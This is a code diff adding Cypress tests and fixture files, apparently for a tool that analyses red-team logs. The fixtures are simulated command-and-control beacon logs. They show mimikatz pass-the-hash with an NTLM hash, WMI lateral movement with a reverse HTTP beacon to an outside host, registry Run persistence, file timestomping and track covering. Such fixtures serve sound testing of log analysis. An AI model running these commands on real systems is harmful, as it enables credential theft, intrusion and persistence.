Cypress Upload Logs Test - Red Team

applications/redeye-e2e/cypress.config.js

@@ -3,11 +3,10 @@ const { defineConfig } = require('cypress');
 module.exports = defineConfig({
 	fixturesFolder: './src/fixtures',
 	modifyObstructiveCode: false,
-	video: false,
+	videoUploadOnPasses: false,
 	videosFolder: '../../dist/applications/redeye-e2e/videos',
 	screenshotsFolder: '../../dist/applications/redeye-e2e/screenshots',
 	failOnStatusCode: false,
-	experimentalWebKitSupport: true,
 	viewportWidth: 1920,
 	viewportHeight: 1080,
 	reporter: '../../node_modules/cypress-multi-reporters',
@@ -19,7 +18,6 @@ module.exports = defineConfig({
 	},
 	e2e: {
 		setupNodeEvents(on, config) {},
-		experimentalSessionAndOrigin: true,
 		specPattern: '../../**/*.cy.js',
 		supportFile: './src/support/index.js',
 		excludeSpecPattern: '*.skip.js',

applications/redeye-e2e/src/fixtures/smalldata/011/201013/172.20.3.108/beacon_518544818.log

@@ -0,0 +1,67 @@
+10/13 16:26:39 UTC [metadata] 192.168.3.108 <- 192.168.3.108; computer: COMPUTER001; user: allison_powell *; process: update.exe; pid: 3812; os: Windows; version: 6.2; build: 9200; beacon arch: x64 (x64)
+10/13 16:28:23 UTC [input] <analyst01> rev2self
+10/13 16:28:23 UTC [task] <T1134> Tasked beacon to revert token
+10/13 16:28:23 UTC [input] <analyst01> pth EXAMPLE\PRESTON_SMITH 5dd210785947abcb14a0d855fa90a5e1
+10/13 16:28:23 UTC [task] <T1075, T1093> Tasked beacon to run mimikatz's sekurlsa::pth /user:PRESTON_SMITH /domain:EXAMPLE /ntlm:5dd210785947abcb14a0d855fa90a5e1 /run:"%COMSPEC% /c echo 71394c3e62c > \\.\pipe\13c777" command
+10/13 16:28:23 UTC [input] <analyst01> jump lateral 192.168.3.71 demo
+10/13 16:28:23 UTC [task] <T1546.003> Tasked Beacon to jump to 192.168.3.71 (windows/beacon_http/reverse_http (10.20.19.157:80)) via wmi shenanigans
+10/13 16:28:25 UTC [task] <T1093> Tasked beacon to run .NET program: lateral.exe -w 192.168.3.71
+10/13 16:28:31 UTC [checkin] host called home, sent: 851649 bytes
+10/13 16:28:32 UTC [output]
+Impersonated EXAMPLE\allison_powell
+
+10/13 16:28:32 UTC [output]
+received output:
+user	: PRESTON_SMITH
+domain	: EXAMPLE
+program	: C:\Windows\system32\cmd.exe /c echo 71394c3e62c > \\.\pipe\13c777
+impers.	: no
+NTLM	: 5dd210785947abcb14a0d855fa90a5e1
+  |  PID  2936
+  |  TID  3708
+  |  LSA Process is now R/W
+  |  LUID 0 ; 51448631 (00000000:03110b37)
+  \_ msv1_0   - data copy @ 000001693C6D5F70 : OK !
+  \_ kerberos - data copy @ 000001693CE45E68
+   \_ aes256_hmac       -> null             
+   \_ aes128_hmac       -> null             
+   \_ rc4_hmac_nt       OK
+   \_ rc4_hmac_old      OK
+   \_ rc4_md4           OK
+   \_ rc4_hmac_nt_exp   OK
+   \_ rc4_hmac_old_exp  OK
+   \_ *Password replace @ 000001693CE556C8 (32) -> null
+
+
+10/13 16:28:32 UTC [output]
+received output:
+
+Starting lateral movement using wmi to 192.168.3.71
+Writing \\192.168.3.71\C$\Windows\winproc.exe
+
+
+10/13 16:29:32 UTC [output]
+received output:
+Creating event filter
+Creating event consumer
+Binding filter and consumer
+
+Waiting for trigger
+
+
+
+10/13 16:30:32 UTC [output]
+received output:
+
+Event Filters: 
+Removed filter
+
+Event Consumers: 
+Removed filter
+
+Bindings: 
+Removed binding
+Covering tracks
+Deleted \\192.168.3.71\C$\Windows\winproc.exe
+
+

applications/redeye-e2e/src/fixtures/smalldata/011/201013/172.20.3.71/beacon_371268642.log

@@ -0,0 +1 @@
+10/13 16:29:29 UTC [metadata] 192.168.3.71 <- 192.168.3.71; computer: COMPUTER004; user: SYSTEM *; process: winproc02.exe; pid: 5412; os: Windows; version: 10.0; build: 14393; beacon arch: x64 (x64)

applications/redeye-e2e/src/fixtures/smalldata/011/201013/events.log

@@ -0,0 +1,3 @@
+10/13 16:26:18 UTC *** analyst01 joined
+10/13 16:26:31 UTC *** initial beacon from allison_powell *@192.168.3.108 (COMPUTER001)
+10/13 16:29:24 UTC *** initial beacon from SYSTEM *@192.168.3.71 (COMPUTER004)

applications/redeye-e2e/src/fixtures/smalldata/012/201023/172.20.3.108/beacon_209150344.log

@@ -0,0 +1,12 @@
+10/23 18:51:22 UTC [metadata] 192.168.3.108 <- 192.168.3.108; computer: COMPUTER001; user: allison_powell *; process: update.exe; pid: 5788; os: Windows; version: 6.2; build: 9200; beacon arch: x64 (x64)
+10/23 18:52:13 UTC [input] <analyst01> execute-assembly /home/analyst01/payloads/Persistance.exe -c
+10/23 18:52:13 UTC [task] <T1093> Tasked beacon to run .NET program: Persistance.exe -c
+10/23 18:53:13 UTC [checkin] host called home, sent: 125507 bytes
+10/23 18:53:14 UTC [output]
+received output:
+
+Registry HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Values:
+
+Persistance not found
+
+

applications/redeye-e2e/src/fixtures/smalldata/012/201023/events.log

@@ -0,0 +1,2 @@
+10/23 18:50:45 UTC *** analyst01 joined
+10/23 18:51:13 UTC *** initial beacon from allison_powell *@192.168.3.108 (COMPUTER001)

applications/redeye-e2e/src/fixtures/smalldata/013/201023/172.20.3.108/beacon_209150344.log

@@ -0,0 +1,13 @@
+10/23 19:09:32 UTC [metadata] 192.168.3.108 <- 192.168.3.108; computer: COMPUTER001; user: allison_powell *; process: update.exe; pid: 5788; os: Windows; version: 6.2; build: 9200; beacon arch: x64 (x64)
+10/23 19:10:43 UTC [input] <analyst01> jump user_persist COMPUTER001 demo
+10/23 19:10:43 UTC [task] <T1547.001> Tasked Beacon to jump to COMPUTER001 (windows/beacon_http/reverse_http (10.20.19.157:80)) via registry persistance
+10/23 19:10:44 UTC [task] <T1093> Tasked beacon to run .NET program: persist.exe -a
+10/23 19:11:29 UTC [checkin] host called home, sent: 411201 bytes
+10/23 19:11:29 UTC [output]
+received output:
+Writing C:\Windows\Tasks\systemupdate.exe
+Setting file timestamp to 2/6/2013 7:27:27 PM
+Adding registry value name: SystemUpdateServices
+Adding registry value data: C:\Windows\Tasks\systemupdate.exe
+
+

applications/redeye-e2e/src/fixtures/smalldata/013/201023/events.log

@@ -0,0 +1,2 @@
+10/23 19:09:28 UTC *** initial beacon from allison_powell *@192.168.3.108 (COMPUTER001)
+10/23 19:09:30 UTC *** analyst01 joined

applications/redeye-e2e/src/fixtures/smalldata/014/201013/172.20.3.108/beacon_518544818.log

@@ -0,0 +1,73 @@
+10/13 16:26:39 UTC [metadata] 192.168.3.108 <- 192.168.3.108; computer: COMPUTER001; user: allison_powell *; process: update.exe; pid: 3812; os: Windows; version: 6.2; build: 9200; beacon arch: x64 (x64)
+10/13 16:28:23 UTC [input] <analyst01> rev2self
+10/13 16:28:23 UTC [task] <T1134> Tasked beacon to revert token
+10/13 16:28:23 UTC [input] <analyst01> pth EXAMPLE\PRESTON_SMITH 5dd210785947abcb14a0d855fa90a5e1
+10/13 16:28:23 UTC [task] <T1075, T1093> Tasked beacon to run mimikatz's sekurlsa::pth /user:PRESTON_SMITH /domain:EXAMPLE /ntlm:5dd210785947abcb14a0d855fa90a5e1 /run:"%COMSPEC% /c echo 71394c3e62c > \\.\pipe\13c777" command
+10/13 16:28:23 UTC [input] <analyst01> jump lateral 192.168.3.71 demo
+10/13 16:28:23 UTC [task] <T1546.003> Tasked Beacon to jump to 192.168.3.71 (windows/beacon_http/reverse_http (10.20.19.157:80)) via wmi shenanigans
+10/13 16:28:25 UTC [task] <T1093> Tasked beacon to run .NET program: lateral.exe -w 192.168.3.71
+10/13 16:28:31 UTC [checkin] host called home, sent: 851649 bytes
+10/13 16:28:32 UTC [output]
+Impersonated EXAMPLE\allison_powell
+
+10/13 16:28:32 UTC [output]
+received output:
+user	: PRESTON_SMITH
+domain	: EXAMPLE
+program	: C:\Windows\system32\cmd.exe /c echo 71394c3e62c > \\.\pipe\13c777
+impers.	: no
+NTLM	: 5dd210785947abcb14a0d855fa90a5e1
+  |  PID  2936
+  |  TID  3708
+  |  LSA Process is now R/W
+  |  LUID 0 ; 51448631 (00000000:03110b37)
+  \_ msv1_0   - data copy @ 000001693C6D5F70 : OK !
+  \_ kerberos - data copy @ 000001693CE45E68
+   \_ aes256_hmac       -> null             
+   \_ aes128_hmac       -> null             
+   \_ rc4_hmac_nt       OK
+   \_ rc4_hmac_old      OK
+   \_ rc4_md4           OK
+   \_ rc4_hmac_nt_exp   OK
+   \_ rc4_hmac_old_exp  OK
+   \_ *Password replace @ 000001693CE556C8 (32) -> null
+
+
+10/13 16:28:32 UTC [output]
+received output:
+
+Starting lateral movement using wmi to 192.168.3.71
+Writing \\192.168.3.71\C$\Windows\winproc.exe
+
+
+10/13 16:29:32 UTC [output]
+received output:
+Creating event filter
+Creating event consumer
+Binding filter and consumer
+
+Waiting for trigger
+
+
+
+10/13 16:30:32 UTC [output]
+received output:
+
+Event Filters: 
+Removed filter
+
+Event Consumers: 
+Removed filter
+
+Bindings: 
+Removed binding
+Covering tracks
+Deleted \\192.168.3.71\C$\Windows\winproc.exe
+
+
+10/13 17:39:31 UTC [input] <analyst01> exit
+10/13 17:39:31 UTC [task] <> Tasked beacon to exit
+10/13 17:39:34 UTC [checkin] host called home, sent: 8 bytes
+10/13 17:39:34 UTC [output]
+beacon exit.
+

applications/redeye-e2e/src/fixtures/smalldata/014/201013/172.20.3.71/beacon_371268642.log

@@ -0,0 +1,7 @@
+10/13 16:29:29 UTC [metadata] 192.168.3.71 <- 192.168.3.71; computer: COMPUTER004; user: SYSTEM *; process: winproc02.exe; pid: 5412; os: Windows; version: 10.0; build: 14393; beacon arch: x64 (x64)
+10/13 17:39:27 UTC [input] <analyst01> exit
+10/13 17:39:27 UTC [task] <> Tasked beacon to exit
+10/13 17:40:25 UTC [checkin] host called home, sent: 8 bytes
+10/13 17:40:25 UTC [output]
+beacon exit.
+

applications/redeye-e2e/src/fixtures/smalldata/014/201013/events.log

@@ -0,0 +1,4 @@
+10/13 16:26:18 UTC *** analyst01 joined
+10/13 16:26:31 UTC *** initial beacon from allison_powell *@192.168.3.108 (COMPUTER001)
+10/13 16:29:24 UTC *** initial beacon from SYSTEM *@192.168.3.71 (COMPUTER004)
+10/13 17:40:41 UTC *** analyst01 quit

applications/redeye-e2e/src/integration/e2e/command-count.cy.js → applications/redeye-e2e/src/integration/e2e/redteam/command-count.cy.js

@@ -1,6 +1,6 @@
 /// <reference types="cypress" />
 
-import { graphqlRequest } from '../../support/utils';
+import { graphqlRequest } from '../../../support/utils.js';
 
 describe('Command counts', () => {
 	const camp = 'commandcounts';

applications/redeye-e2e/src/integration/e2e/redteam/uploadRawLogs.cy.js

@@ -0,0 +1,25 @@
+/// <reference types="cypress" />
+
+describe('Timeline tests', () => {
+	const camp = '200817';
+
+	it('Verify timeline features', () => {
+		cy.get('[cy-test=add-campaign-btn]').click();
+
+		cy.uploadLogs('seb', camp);
+
+		cy.wait(500);
+
+		cy.get('[cy-test=close-log]').click();
+
+		cy.reload();
+
+		cy.get('[cy-test=beacon-count]').invoke('text').should('contain', '4');
+
+		cy.get('[cy-test=command-count]').invoke('text').should('contain', '7');
+	});
+
+	after(() => {
+		cy.deleteCampaignGraphQL(camp);
+	});
+});

applications/redeye-e2e/src/support/graphqlCommands.js

@@ -22,7 +22,7 @@ Cypress.Commands.add('uploadLogs', (creatorName, folderName) => {
         name
       }
 		}`;
-		const variables1 = `{"campaignId": "${camp}", "name": "200817", "path": "/Users/angd742/Projects/redeye/applications/redeye-e2e/src/fixtures/TestDataSet/200817"}`;
+		const variables1 = `{"campaignId": "${camp}", "name": "200817", "path": "applications/redeye-e2e/src/fixtures/smalldata"}`;
 		mutRequest(mutation2, variables1).then((res) => {
 			cy.log(res);
 		});
@@ -35,95 +35,14 @@ Cypress.Commands.add('uploadLogs', (creatorName, folderName) => {
 		graphqlRequest(query).then((res) => {
 			cy.log(res);
 		});
-		// 	const mutation1 = `
-		//     mutation serversParse($campaignId: String!) {
-		//       serversParse(campaignId: $campaignId)
-		//   }`;
+		const mutation1 = `
+		    mutation serversParse($campaignId: String!) {
+		      serversParse(campaignId: $campaignId)
+		  }`;
 
-		// 	const variables = `{"campaignId": "${camp}"}`;
-		// 	mutRequest(mutation1, variables).then((res) => {
-		// 		cy.log(res);
-		// 	});
-		// });
+		const variables = `{"campaignId": "${camp}"}`;
+		mutRequest(mutation1, variables).then((res) => {
+			cy.log(res);
+		});
 	});
 });
-
-// Cypress.Commands.add('uploadCampaign1', (creatorName, folderName) => {
-// 	let newId;
-
-// 	const mutation = `
-//   mutation createCampaign($creatorName: String!, $name: String!) {
-//     createCampaign(creatorName: $creatorName, name: $name) {
-//       __typename
-//       id
-//       annotationCount
-//       beaconCount
-//       bloodStrikeServerCount
-//       commandCount
-//       computerCount
-//       firstLogTime
-//       lastLogTime
-//       name
-//       parsingStatus
-//       lastOpenedBy {
-
-//       __typename
-//       id
-//       id
-
-//       }
-//       creator {
-
-//       __typename
-//       id
-//       id
-//       }
-
-//             }
-// }`;
-
-// 	cy
-// 		.request({
-// 			url: 'http://localhost:4000/api/graphql',
-// 			method: 'POST',
-// 			failOnStatusCode: false,
-// 			body: { query: mutation },
-// 		})
-// 		.then(() => {
-// 			const query = `{
-//     campaigns {
-//       id
-//       name
-//     }
-//   }`;
-// 			cy.request({
-// 				url: 'http://localhost:4000/api/graphql',
-// 				method: 'POST',
-// 				failOnStatusCode: false,
-// 				body: { query },
-// 			});
-// 		})
-// 		.then((response) => {
-// 			let body = response.body.data.campaigns;
-// 			cy.log(body);
-// 			const last = [...body].pop();
-// 			newId = last['id'];
-// 			cy.log(newId);
-// 		})
-// 		.then(() => {
-// 			const mutation2 = `
-//   mutation    {
-//     addLocalServerFolder(campaignId: ${newId}, fixture: "TestDataSet/${folderName}")
-//   }`;
-// 			cy
-// 				.request({
-// 					url: 'http://localhost:4000/api/graphql',
-// 					method: 'POST',
-// 					failOnStatusCode: false,
-// 					body: { query: mutation2 },
-// 				})
-// 				.then((res) => {
-// 					cy.log(res);
-// 				});
-// 		});
-// 	cy.reload();

package.json

@@ -156,7 +156,7 @@
 		"barrelsby": "^2.3.0",
 		"builder-util": "^23.0.2",
 		"cross-env": "^7.0.3",
-		"cypress": "^11.2.0",
+		"cypress": "^12.3.0",
 		"cypress-multi-reporters": "^1.6.1",
 		"dotenv": "^8.2.0",
 		"eslint": "^8.22.0",
@@ -193,7 +193,6 @@
 		"nx": "^14.6.3",
 		"pkg": "^5.8.0",
 		"pkg-fetch": "^3.4.2",
-		"playwright-webkit": "^1.25.2",
 		"prettier": "^2.2.1",
 		"rollup-plugin-auto-external": "^2.0.0",
 		"save-svg-as-png": "^1.4.17",